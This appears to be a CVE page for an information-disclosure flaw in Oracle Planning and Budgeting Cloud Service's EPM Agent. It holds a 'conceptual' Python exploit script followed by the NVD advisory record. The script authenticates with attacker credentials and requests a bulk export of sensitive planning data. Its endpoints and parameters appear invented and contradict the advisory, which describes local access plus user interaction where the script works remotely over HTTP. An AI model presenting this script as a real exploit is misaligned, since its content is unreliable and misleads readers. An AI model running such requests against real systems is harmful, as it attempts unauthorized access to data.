CVE-2026-21979

# CVE-2026-21979 PoC - EPM Agent Information Disclosure # Note: This is a conceptual PoC for educational purposes only # Requires: Local access + High privileges + User interaction import requests import json import sys def exploit_cve_2026_21979(target_url, attacker_creds): """ Conceptual proof of concept for CVE-2026-21979 Exploits EPM Agent component in Oracle Hyperion Planning and Budgeting Cloud Service """ print(f"[*] Targeting: {target_url}") print(f"[*] Exploiting CVE-2026-21979 - EPM Agent Information Disclosure") # Step 1: Authenticate with high-privilege account session = requests.Session() auth_endpoint = f"{target_url}/epm agent/api/v1/auth/login" try: # Attempt authentication auth_response = session.post(auth_endpoint, json=attacker_creds, timeout=30) if auth_response.status_code == 200: print("[+] Authentication successful with high-privilege account") token = auth_response.json().get('session_token') # Step 2: Exploit EPM Agent endpoint to access sensitive data exploit_endpoint = f"{target_url}/epm agent/api/v1/data/planning" headers = { 'Authorization': f'Bearer {token}', 'Content-Type': 'application/json' } # Crafted request to trigger information disclosure exploit_payload = { 'action': 'export_data', 'parameters': { 'include_sensitive': True, 'scope': 'all' # Attempt to access all data } } print("[*] Sending exploit request to EPM Agent...") exploit_response = session.post(exploit_endpoint, json=exploit_payload, headers=headers) if exploit_response.status_code == 200: data = exploit_response.json() print(f"[!] Successfully extracted sensitive data: {len(str(data))} bytes") print(f"[+] Sample data: {str(data)[:500]}...") return True else: print(f"[-] Exploit failed with status: {exploit_response.status_code}") return False else: print(f"[-] Authentication failed: {auth_response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Connection error: {str(e)}") return False if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print("Example: python exploit.py https://planning.oraclecloud.com") sys.exit(1) target = sys.argv[1] # High-privilege attacker credentials (requires prior compromise) creds = { 'username': 'attacker_high_priv', 'password': 'compromised_password', 'domain': 'EPMPROD' } exploit_cve_2026_21979(target, creds)

{"cve": {"id": "CVE-2026-21979", "sourceIdentifier": "[email protected]", "published": "2026-01-20T22:16:01.267", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle Planning and Budgeting Cloud Service product of Oracle Hyperion (component: EPM Agent). The supported version that is affected is 25.04.07. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle Planning and Budgeting Cloud Service executes to compromise Oracle Planning and Budgeting Cloud Service. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Planning and Budgeting Cloud Service accessible data. Note: Update EPM Agent. Please refer to <a href=\"https://docs.oracle.com/en/cloud/saas/enterprise-performance-management-common/diepm/epm_agent_downloading_agent_110x80569d70.html\">Downloading the EPM Agent for more information. CVSS 3.1 Base Score 4.2 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N)."}, {"lang": "es", "value": "Vulnerabilidad en el producto Oracle Planning and Budgeting Cloud Service de Oracle Hyperion (componente: EPM Agent). La versión soportada que está afectada es 25.04.07. Vulnerabilidad fácilmente explotable permite a un atacante con altos privilegios y acceso a la infraestructura donde se ejecuta Oracle Planning and Budgeting Cloud Service comprometer Oracle Planning and Budgeting Cloud Service. Los ataques exitosos requieren interacción humana de una persona distinta al atacante. Los ataques exitosos de esta vulnerabilidad pueden resultar en acceso no autorizado a datos críticos o acceso completo a todos los datos accesibles de Oracle Planning and Budgeting Cloud Service. Nota: Actualice el EPM Agent. Consulte <a href=\"https://docs.oracle.com/en/cloud/saas/enterprise-performance-management-common/diepm/epm_agent_downloading_agent_110x80569d70.html\" rel=\"nofollow\">Downloading the EPM Agent para más información. Puntuación Base CVSS 3.1 de 4.2 (Impactos en la confidencialidad). Vector CVSS: (CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N).</a>"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N", "baseScore": 4.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.6, "impactScore": 3.6}]}, "references": [{"url": "https://www.oracle.com/security-alerts/cpujan2026.html", "source": "[email protected]"}]}}